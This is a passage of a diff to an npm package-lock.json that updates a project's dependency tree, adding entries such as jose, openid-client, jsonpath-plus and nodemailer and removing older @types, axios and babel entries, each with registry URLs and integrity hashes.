"sha512-sz7iLqvVUg1gIedBOvlkxPlc8/uVzyS5OwGz1cKjXzkl3FpL3al0crU8YGU1WoHkxn0Wxbw5tyi6hvzJKNzFsw==", - "dev": true + "node_modules/jest-diff/node_modules/@sinclair/typebox": { + "version": "0.34.37", + "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.34.37.tgz", + "integrity": "sha512-2TRuQVgQYfy+EzHRTIvkhv2ADEouJ2xNS/Vq+W5EuuewBdOrvATvljZTxHWZSTYr2sTjTHpGvucaGAt67S2akw==", + "dev": true, + "license": "MIT" }, - "node_modules/@types/istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", + "node_modules/jest-diff/node_modules/ansi-styles": { + "version": "5.2.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", + "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", "dev": true, - "dependencies": { - "@types/istanbul-lib-coverage": "*" + "license": "MIT", + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" } }, - "node_modules/@types/istanbul-reports": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.1.tgz", - "integrity": "sha512-c3mAZEuK0lvBp8tmuL74XRKn1+y2dcwOUpH7x4WrF6gk1GIgiluDRgMYQtw2OFcBvAJWlt6ASU3tSqxp0Uu0Aw==", + "node_modules/jest-diff/node_modules/pretty-format": { + "version": "30.0.2", + "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-30.0.2.tgz", + "integrity": "sha512-yC5/EBSOrTtqhCKfLHqoUIAXVRZnukHPwWBJWR7h84Q3Be1DRQZLncwcfLoPA5RPQ65qfiCMqgYwdUuQ//eVpg==", "dev": true, + "license": "MIT", "dependencies": { - "@types/istanbul-lib-report": "*" + "@jest/schemas": "30.0.1", + "ansi-styles": "^5.2.0", + "react-is": "^18.3.1" + }, + "engines": { + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@types/jest": { - "version": "29.4.0", - "resolved": "https://registry.npmjs.org/@types/jest/-/jest-29.4.0.tgz", - "integrity": "sha512-VaywcGQ9tPorCX/Jkkni7RWGFfI11whqzs8dvxF41P17Z+z872thvEvlIbznjPJ02kl1HMX3LmLOonsj2n7HeQ==", + "node_modules/jest-regex-util": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-30.0.1.tgz", + "integrity": "sha512-jHEQgBXAgc+Gh4g0p3bCevgRCVRkB4VB70zhoAE48gxeSr1hfUOsM/C2WoJgVL7Eyg//hudYENbm3Ne+/dRVVA==", "dev": true, - "dependencies": { - "expect": "^29.0.0", - "pretty-format": "^29.0.0" + "license": "MIT", + "engines": { + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@types/js-yaml": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/@types/js-yaml/-/js-yaml-4.0.2.tgz", - "integrity": "sha512-KbeHS/Y4R+k+5sWXEYzAZKuB1yQlZtEghuhRxrVRLaqhtoG5+26JwQsa4HyS3AWX8v1Uwukma5HheduUDskasA==" - }, - "node_modules/@types/lodash": { - "version": "4.14.172", - "resolved": "https://registry.npmjs.org/@types/lodash/-/lodash-4.14.172.tgz", - "integrity": "sha512-/BHF5HAx3em7/KkzVKm3LrsD6HZAXuXO1AJZQ3cRRBZj4oHZDviWPYu0aEplAqDFNHZPW6d3G7KN+ONcCCC7pw==", - "dev": true - }, - "node_modules/@types/mustache": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/@types/mustache/-/mustache-4.1.2.tgz", - "integrity": "sha512-c4OVMMcyodKQ9dpwBwh3ofK9P6U9ZktKU9S+p33UqwMNN1vlv2P0zJZUScTshnx7OEoIIRcCFNQ904sYxZz8kg==", - "dev": true - }, - "node_modules/@types/node": { - "version": "16.11.19", - "resolved": "https://registry.npmjs.org/@types/node/-/node-16.11.19.tgz", - "integrity": "sha512-BPAcfDPoHlRQNKktbsbnpACGdypPFBuX4xQlsWDE7B8XXcfII+SpOLay3/qZmCLb39kV5S1RTYwXdkx2lwLYng==" - }, - "node_modules/@types/nodemailer": { - "version": "6.4.4", - "resolved": "https://registry.npmjs.org/@types/nodemailer/-/nodemailer-6.4.4.tgz", - "integrity": "sha512-Ksw4t7iliXeYGvIQcSIgWQ5BLuC/mljIEbjf615svhZL10PE9t+ei8O9gDaD3FPCasUJn9KTLwz2JFJyiiyuqw==", + "node_modules/jose": { + "version": "6.0.11", + "resolved": "https://registry.npmjs.org/jose/-/jose-6.0.11.tgz", + "integrity": "sha512-QxG7EaliDARm1O1S8BGakqncGT9s25bKL1WSf6/oa17Tkqwi8D2ZNglqCF+DsYF88/rV66Q/Q2mFAy697E1DUg==", "dev": true, - "dependencies": { - "@types/node": "*" + "license": "MIT", + "funding": { + "url": "https://github.com/sponsors/panva" } }, - "node_modules/@types/nunjucks": { - "version": "3.1.5", - "resolved": "https://registry.npmjs.org/@types/nunjucks/-/nunjucks-3.1.5.tgz", - "integrity": "sha512-0zEdmQNNvQ+xyV9kqQvAV93UVroTwhE78toVUDT0GBnGcW2jQBZnB4al9qq2LqI5qHOqROy/DvvAY/UwrbvV1A==", - "dev": true - }, - "node_modules/@types/prettier": { - "version": "2.7.2", - "resolved": "https://registry.npmjs.org/@types/prettier/-/prettier-2.7.2.tgz", - "integrity": "sha512-KufADq8uQqo1pYKVIYzfKbJfBAc0sOeXqGbFaSpv8MRmC/zXgowNZmFcbngndGk922QDmOASEXUZCaY48gs4cg==", - "dev": true + "node_modules/js-tokens": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", + "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", + "dev": true, + "license": "MIT" }, - "node_modules/@types/request": { - "version": "2.48.7", - "resolved": "https://registry.npmjs.org/@types/request/-/request-2.48.7.tgz", - "integrity": "sha512-GWP9AZW7foLd4YQxyFZDBepl0lPsWLMEXDZUjQ/c1gqVPDPECrRZyEzuhJdnPWioFCq3Tv0qoGpMD6U+ygd4ZA==", + "node_modules/js-yaml": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-4.1.0.tgz", + "integrity": "sha512-wpxZs9NoxZaJESJGIZTyDEaYpl0FKSA+FB9aJiyemKhMwkxQg63h4T1KJgUGHpTqPDNRcmmYLugrRjJlBtWvRA==", "dependencies": { - "@types/caseless": "*", - "@types/node": "*", - "@types/tough-cookie": "*", - "form-data": "^2.5.0" + "argparse": "^2.0.1" + }, + "bin": { + "js-yaml": "bin/js-yaml.js" } }, - "node_modules/@types/stack-utils": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.1.tgz", - "integrity": "sha512-Hl219/BT5fLAaz6NDkSuhzasy49dwQS/DSdu4MdggFB8zcXv7vflBI3xp7FEmkmdDkBUI2bPUNeMttp2knYdxw==", - "dev": true - }, - "node_modules/@types/tough-cookie": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/@types/tough-cookie/-/tough-cookie-4.0.1.tgz", - "integrity": "sha512-Y0K95ThC3esLEYD6ZuqNek29lNX2EM1qxV8y2FTLUB0ff5wWrk7az+mLrnNFUnaXcgKye22+sFBRXOgpPILZNg==" + "node_modules/jsbn": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-1.1.0.tgz", + "integrity": "sha512-4bYVV3aAMtDTTu4+xsDYa6sy9GyJ69/amsu9sYF2zqjiEoZA5xJi3BrfX3uY+/IekIu7MwdObdbDWpoZdBv3/A==", + "dev": true, + "license": "MIT" }, - "node_modules/@types/ws": { - "version": "8.5.4", - "resolved": "https://registry.npmjs.org/@types/ws/-/ws-8.5.4.tgz", - "integrity": "sha512-zdQDHKUgcX/zBc4GrwsE/7dVdAD8JR4EuiAXiiUhhfyIJXXb2+PrGshFyeXWQPMmmZ2XxgaqclgpIC7eTXc1mg==", - "dependencies": { - "@types/node": "*" + "node_modules/jsep": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/jsep/-/jsep-1.4.0.tgz", + "integrity": "sha512-B7qPcEVE3NVkmSJbaYxvv4cHkVW7DQsZz13pUMrfS8z8Q/BuShN+gcTXrUlPiGqM2/t/EEaI030bpxMqY8gMlw==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">= 10.16.0" } }, - "node_modules/@types/yargs": { - "version": "17.0.22", - "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.22.tgz", - "integrity": "sha512-pet5WJ9U8yPVRhkwuEIp5ktAeAqRZOq4UdAyWLWzxbtpyXnzbtLdKiXAjJzi/KLmPGS9wk86lUFWZFN6sISo4g==", + "node_modules/jsonpath-plus": { + "version": "10.3.0", + "resolved": "https://registry.npmjs.org/jsonpath-plus/-/jsonpath-plus-10.3.0.tgz", + "integrity": "sha512-8TNmfeTCk2Le33A3vRRwtuworG/L5RrgMvdjhKZxvyShO+mBu2fP50OWUjRLNtvw344DdDarFh9buFAZs5ujeA==", "dev": true, + "license": "MIT", "dependencies": { - "@types/yargs-parser": "*" + "@jsep-plugin/assignment": "^1.3.0", + "@jsep-plugin/regex": "^1.0.4", + "jsep": "^1.4.0" + }, + "bin": { + "jsonpath": "bin/jsonpath-cli.js", + "jsonpath-plus": "bin/jsonpath-cli.js" + }, + "engines": { + "node": ">=18.0.0" } }, - "node_modules/@types/yargs-parser": { - "version": "20.2.1", - "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-20.2.1.tgz", - "integrity": "sha512-7tFImggNeNBVMsn0vLrpn1H1uPrUBdnARPTpZoitY37ZrdJREzf7I16tMrlK3hen349gr1NYh8CmZQa7CTG6Aw==", - "dev": true + "node_modules/lodash-es": { + "version": "4.17.21", + "resolved": "https://registry.npmjs.org/lodash-es/-/lodash-es-4.17.21.tgz", + "integrity": "sha512-mKnC+QJ9pWVzv+C4/U3rRsHapFfHvQFoFB92e52xeyGMcX6/OlIl78je1u8vePzYZSkkogMPJ2yjxxsb89cxyw==", + "license": "MIT" }, - "node_modules/a-sync-waterfall": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/a-sync-waterfall/-/a-sync-waterfall-1.0.1.tgz", - "integrity": "sha512-RYTOHHdWipFUliRFMCS4X2Yn2X8M87V/OpSqWzKKOGhzqyUxzyVmhHDH9sAvG+ZuQf/TAOFsLCpMw09I1ufUnA==" + "node_modules/math-intrinsics": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/math-intrinsics/-/math-intrinsics-1.1.0.tgz", + "integrity": "sha512-/IXtbwEk5HTPyEwyKX6hGkYXxM9nbj64B+ilVJnC/R6B0pH5G4V3b0pVbL7DBj4tkhBAppbQUlf6F6Xl9LHu1g==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">= 0.4" + } }, - "node_modules/ajv": { - "version": "6.12.6", - "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.12.6.tgz", - "integrity": "sha512-j3fVLgvTo527anyYyJOGTYJbG+vnnQYvE0m5mmkc1TK+nxAppkCLMIL0aZ4dblVCNoGShhm+kzE4ZUykBoMg4g==", + "node_modules/micromatch": { + "version": "4.0.8", + "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.8.tgz", + "integrity": "sha512-PXwfBhYu0hBCPw8Dn0E+WDYb7af3dSLVWKi3HGv84IdF4TyFoC0ysxFd0Goxw7nSv4T/PzEJQxsYsEiFCKo2BA==", + "dev": true, + "license": "MIT", "dependencies": { - "fast-deep-equal": "^3.1.1", - "fast-json-stable-stringify": "^2.0.0", - "json-schema-traverse": "^0.4.1", - "uri-js": "^4.2.2" + "braces": "^3.0.3", + "picomatch": "^2.3.1" }, - "funding": { - "type": "github", - "url": "https://github.com/sponsors/epoberezkin" + "engines": { + "node": ">=8.6" } }, - "node_modules/ansi-escapes": { - "version": "4.3.2", - "resolved": "https://registry.npmjs.org/ansi-escapes/-/ansi-escapes-4.3.2.tgz", - "integrity": "sha512-gKXj5ALrKWQLsYG9jlTRmR/xKluxHV+Z9QEwNIgCfM1/uwPMCuzVVnh5mwTd+OuBZcwSIMbqssNWRm1lE51QaQ==", + "node_modules/micromatch/node_modules/picomatch": { + "version": "2.3.1", + "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", + "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", "dev": true, - "dependencies": { - "type-fest": "^0.21.3" - }, + "license": "MIT", "engines": { - "node": ">=8" + "node": ">=8.6" }, "funding": { - "url": "https://github.com/sponsors/sindresorhus" + "url": "https://github.com/sponsors/jonschlinkert" } }, - "node_modules/ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", + "node_modules/mime-db": { + "version": "1.49.0", + "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.49.0.tgz", + "integrity": "sha512-CIc8j9URtOVApSFCQIF+VBkX1RwXp/oMMOrqdyXSBXq5RWNEsRfyj1kiRnQgmNXmHxPoFIxOroKA3zcU9P+nAA==", "dev": true, "engines": { - "node": ">=8" + "node": ">= 0.6" } }, - "node_modules/ansi-styles": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", - "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "node_modules/mime-types": { + "version": "2.1.32", + "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.32.tgz", + "integrity": "sha512-hJGaVS4G4c9TSMYh2n6SQAGrC4RnfU+daP8G7cSCmaqNjiOoUY0VHCMS42pxnQmVF1GWwFhbHWn3RIxCqTmZ9A==", "dev": true, "dependencies": { - "color-convert": "^2.0.1" + "mime-db": "1.49.0" }, "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" + "node": ">= 0.6" } }, - "node_modules/anymatch": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/anymatch/-/anymatch-3.1.2.tgz", - "integrity": "sha512-P43ePfOAIupkguHUycrc4qJ9kz8ZiuOUijaETwX7THt0Y/GNK7v0aa8rY816xWjZ7rJdA5XdMcpVFTKMq+RvWg==", + "node_modules/ms": { + "version": "2.1.3", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.3.tgz", + "integrity": "sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==", + "dev": true, + "license": "MIT" + }, + "node_modules/node-fetch": { + "version": "2.7.0", + "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-2.7.0.tgz", + "integrity": "sha512-c4FRfUm/dbcWZ7U+1Wq0AwCyFL+3nt2bEw05wfxSz+DWpWsitgmSgYmy2dQdWyKC1694ELPqMs/YzUSNozLt8A==", "dev": true, + "license": "MIT", "dependencies": { - "normalize-path": "^3.0.0", - "picomatch": "^2.0.4" + "whatwg-url": "^5.0.0" }, "engines": { - "node": ">= 8" - } - }, - "node_modules/argparse": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-2.0.1.tgz", - "integrity": "sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q==" - }, - "node_modules/asap": { - "version": "2.0.6", - "resolved": "https://registry.npmjs.org/asap/-/asap-2.0.6.tgz", - "integrity": "sha1-5QNHYR1+aQlDIIu9r+vLwvuGbUY=" - }, - "node_modules/asn1": { - "version": "0.2.4", - "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.4.tgz", - "integrity": "sha512-jxwzQpLQjSmWXgwaCZE9Nz+glAG01yF1QnWgbhGwHI5A6FRIEY6IVqtHhIepHqI7/kyEyQEagBC5mBEFlIYvdg==", - "dependencies": { - "safer-buffer": "~2.1.0" - } - }, - "node_modules/assert-plus": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", - "integrity": "sha1-8S4PPF13sLHN2RRpQuTpbB5N1SU=", - "engines": { - "node": ">=0.8" + "node": "4.x || >=6.0.0" + }, + "peerDependencies": { + "encoding": "^0.1.0" + }, + "peerDependenciesMeta": { + "encoding": { + "optional": true + } } }, - "node_modules/asynckit": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", - "integrity": "sha1-x57Zf380y48robyXkLzDZkdLS3k=" - }, - "node_modules/aws-sign2": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", - "integrity": "sha1-tG6JCTSpWR8tL2+G1+ap8bP+dqg=", + "node_modules/nodemailer": { + "version": "6.10.1", + "resolved": "https://registry.npmjs.org/nodemailer/-/nodemailer-6.10.1.tgz", + "integrity": "sha512-Z+iLaBGVaSjbIzQ4pX6XV41HrooLsQ10ZWPUehGmuantvzWoDVBnmsdUcOIDM1t+yPor5pDhVlDESgOMEGxhHA==", + "license": "MIT-0", "engines": { - "node": "*" - } - }, - "node_modules/aws4": { - "version": "1.11.0", - "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.11.0.tgz", - "integrity": "sha512-xh1Rl34h6Fi1DC2WWKfxUTVqRsNnr6LsKz2+hfwDxQJWmrx8+c7ylaqBMcHfl1U1r2dsifOvKX3LQuLNZ+XSvA==" - }, - "node_modules/axios": { - "version": "1.6.0", - "resolved": "https://registry.npmjs.org/axios/-/axios-1.6.0.tgz", - "integrity": "sha512-EZ1DYihju9pwVB+jg67ogm+Tmqc6JmhamRN6I4Zt8DfZu5lbcQGw3ozH9lFejSJgs/ibaef3A9PMXPLeefFGJg==", - "dependencies": { - "follow-redirects": "^1.15.0", - "form-data": "^4.0.0", - "proxy-from-env": "^1.1.0" + "node": ">=6.0.0" } }, - "node_modules/axios/node_modules/form-data": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-4.0.0.tgz", - "integrity": "sha512-ETEklSGi5t0QMZuiXoA/Q6vcnxcLQP5vdugSpuAyi6SVGi2clPPp+xgEhuMaHC+zGgn31Kd235W35f7Hykkaww==", + "node_modules/nunjucks": { + "version": "3.2.4", + "resolved": "https://registry.npmjs.org/nunjucks/-/nunjucks-3.2.4.tgz", + "integrity": "sha512-26XRV6BhkgK0VOxfbU5cQI+ICFUtMLixv1noZn1tGU38kQH5A5nmmbk/O45xdyBhD1esk47nKrY0mvQpZIhRjQ==", "dependencies": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.8", - "mime-types": "^2.1.12" + "a-sync-waterfall": "^1.0.0", + "asap": "^2.0.3", + "commander": "^5.1.0" }, - "engines": { - "node": ">= 6" - } - }, - "node_modules/babel-plugin-istanbul": { - "version": "6.1.1", - "resolved": "https://registry.npmjs.org/babel-plugin-istanbul/-/babel-plugin-istanbul-6.1.1.tgz", - "integrity": "sha512-Y1IQok9821cC9onCx5otgFfRm7Lm+I+wwxOx738M/WLPZ9Q42m4IG5W0FNX8WLL2gYMZo3JkuXIH2DOpWM+qwA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.0.0", - "@istanbuljs/load-nyc-config": "^1.0.0", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-instrument": "^5.0.4", - "test-exclude": "^6.0.0" + "bin": { + "nunjucks-precompile": "bin/precompile" }, "engines": { - "node": ">=8" - } - }, - "node_modules/babel-preset-current-node-syntax": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/babel-preset-current-node-syntax/-/babel-preset-current-node-syntax-1.0.1.tgz", - "integrity": "sha512-M7LQ0bxarkxQoN+vz5aJPsLBn77n8QgTFmo8WK0/44auK2xlCXrYcUxHFxgU7qW5Yzw/CjmLRK2uJzaCd7LvqQ==", - "dev": true, - "dependencies": { - "@babel/plugin-syntax-async-generators": "^7.8.4", - "@babel/plugin-syntax-bigint": "^7.8.3", - "@babel/plugin-syntax-class-properties": "^7.8.3", - "@babel/plugin-syntax-import-meta": "^7.8.3", - "@babel/plugin-syntax-json-strings": "^7.8.3", - "@babel/plugin-syntax-logical-assignment-operators": "^7.8.3", - "@babel/plugin-syntax-nullish-coalescing-operator": "^7.8.3", - "@babel/plugin-syntax-numeric-separator": "^7.8.3", - "@babel/plugin-syntax-object-rest-spread": "^7.8.3", - "@babel/plugin-syntax-optional-catch-binding": "^7.8.3", - "@babel/plugin-syntax-optional-chaining": "^7.8.3", - "@babel/plugin-syntax-top-level-await": "^7.8.3" + "node": ">= 6.9.0" }, "peerDependencies": { - "@babel/core": "^7.0.0" - } - }, - "node_modules/balanced-match": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" - }, - "node_modules/bcrypt-pbkdf": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", - "integrity": "sha1-pDAdOJtqQ/m2f/PKEaP2Y342Dp4=", - "dependencies": { - "tweetnacl": "^0.14.3" + "chokidar": "^3.3.0" + }, + "peerDependenciesMeta": { + "chokidar": { + "optional": true + } } }, - "node_modules/brace-expansion": { - "version": "1.1.11", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", - "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", - "dependencies": { - "balanced-match": "^1.0.0", - "concat-map": "0.0.1" + "node_modules/oauth4webapi": { + "version": "3.5.5", + "resolved": "https://registry.npmjs.org/oauth4webapi/-/oauth4webapi-3.5.5.tgz", + "integrity": "sha512-1K88D2GiAydGblHo39NBro5TebGXa+7tYoyIbxvqv3+haDDry7CBE1eSYuNbOSsYCCU6y0gdynVZAkm4YPw4hg==", + "dev": true, + "license": "MIT", + "funding": { + "url": "https://github.com/sponsors/panva" } }, - "node_modules/braces": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.3.tgz", - "integrity": "sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA==", + "node_modules/once": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", + "integrity": "sha1-WDsap3WWHUsROsF9nFC6753Xa9E=", "dev": true, "dependencies": { - "fill-range": "^7.1.1" - }, - "engines": { - "node": ">=8" + "wrappy": "1" } }, - "node_modules/browserslist": { - "version": "4.16.7", - "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.16.7.tgz", - "integrity": "sha512-7I4qVwqZltJ7j37wObBe3SoTz+nS8APaNcrBOlgoirb6/HbEU2XxW/LpUDTCngM6iauwFqmRTuOMfyKnFGY5JA==", + "node_modules/openid-client": { + "version": "6.6.2", + "resolved": "https://registry.npmjs.org/openid-client/-/openid-client-6.6.2.tgz", + "integrity": "sha512-Xya5TNMnnZuTM6DbHdB4q0S3ig2NTAELnii/ASie1xDEr8iiB8zZbO871OWBdrw++sd3hW6bqWjgcmSy1RTWHA==", "dev": true, + "license": "MIT", "dependencies": { - "caniuse-lite": "^1.0.30001248", - "colorette": "^1.2.2", - "electron-to-chromium": "^1.3.793", - "escalade": "^3.1.1", - "node-releases": "^1.1.73" - }, - "bin": { - "browserslist": "cli.js" - }, - "engines": { - "node": "^6 || ^7 || ^8 || ^9 || ^10 || ^11 || ^12 || >=13.7" + "jose": "^6.0.11", + "oauth4webapi": "^3.5.4" }, "funding": { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" + "url": "https://github.com/sponsors/panva" } }, - "node_modules/bs-logger": { - "version": "0.2.6", - "resolved": "https://registry.npmjs.org/bs-logger/-/bs-logger-0.2.6.tgz", - "integrity": "sha512-pd8DCoxmbgc7hyPKOvxtqNcjYoOsABPQdcCUjGp3d42VR2CX1ORhk2A87oqqu5R1kk+76nsxZupkmyd+MVtCog==", + "node_modules/picocolors": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.1.1.tgz", + "integrity": "sha512-xceH2snhtb5M9liqDsmEw56le376mTZkEX/jEb/RxNFyegNul7eNslCXP9FDj/Lcu0X8KEyMceP2ntpaHrDEVA==", "dev": true, - "dependencies": { - "fast-json-stable-stringify": "2.x" - }, - "engines": { - "node": ">= 6" - } + "license": "ISC" }, - "node_modules/bser": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/bser/-/bser-2.1.1.tgz", - "integrity": "sha512-gQxTNE/GAfIIrmHLUE3oJyp5FO6HRBfhjnw4/wMmA63ZGDJnWBmgY/lyQBpnDUkGmAhbSe39tx2d/iTOAfglwQ==", + "node_modules/pump": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/pump/-/pump-3.0.3.tgz", + "integrity": "sha512-todwxLMY7/heScKmntwQG8CXVkWUOdYxIvY2s0VWAAMh/nd8SoYiRaKjlr7+iCs984f2P8zvrfWcDDYVb73NfA==", "dev": true, + "license": "MIT", "dependencies": { - "node-int64": "^0.4.0" + "end-of-stream": "^1.1.0", + "once": "^1.3.1" } }, - "node_modules/buffer-from": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.2.tgz", - "integrity": "sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==", - "dev": true + "node_modules/react-is": { + "version": "18.3.1", + "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.3.1.tgz", + "integrity": "sha512-/LLMVyas0ljjAtoYiPqYiL8VWXzUUdThrmU5+n20DZv+a+ClRoevUzw5JxU+Ieh5/c87ytoTBV9G1FiKfNJdmg==", + "dev": true, + "license": "MIT" }, - "node_modules/byline": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/byline/-/byline-5.0.0.tgz", - "integrity": "sha1-dBxSFkaOrcRXsDQQEYrXfejB3bE=", - "engines": { - "node": ">=0.10.0" - } + "node_modules/rfc4648": { + "version": "1.5.0", + "resolved": "https://registry.npmjs.org/rfc4648/-/rfc4648-1.5.0.tgz", + "integrity": "sha512-FA6W9lDNeX8WbMY31io1xWg+TpZCbeDKsBo0ocwACZiWnh9TUAyk9CCuBQuOPmYnwwdEQZmraQ2ZK7yJsxErBg==", + "dev": true }, - "node_modules/callsites": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/callsites/-/callsites-3.1.0.tgz", - "integrity": "sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==", + "node_modules/slash": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", + "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", "dev": true, "engines": { - "node": ">=6" + "node": ">=8" } }, - "node_modules/camelcase": { - "version": "5.3.1", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz", - "integrity": "sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg==", + "node_modules/smart-buffer": { + "version": "4.2.0", + "resolved": "https://registry.npmjs.org/smart-buffer/-/smart-buffer-4.2.0.tgz", + "integrity": "sha512-94hK0Hh8rPqQl2xXc3HsaBoOXKV20MToPkcXvwbISWLEs+64sBq5kFgn2kJDHb1Pry9yrP0dxrCI9RRci7RXKg==", "dev": true, + "license": "MIT", "engines": { - "node": ">=6" - } - }, - "node_modules/caniuse-lite": { - "version": "1.0.30001251", - "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001251.tgz", - "integrity": "sha512-HOe1r+9VkU4TFmnU70z+r7OLmtR+/chB1rdcJUeQlAinjEeb0cKL20tlAtOagNZhbrtLnCvV19B4FmF1rgzl6A==", - "dev": true, - "funding": { - "type": "opencollective", - "url": 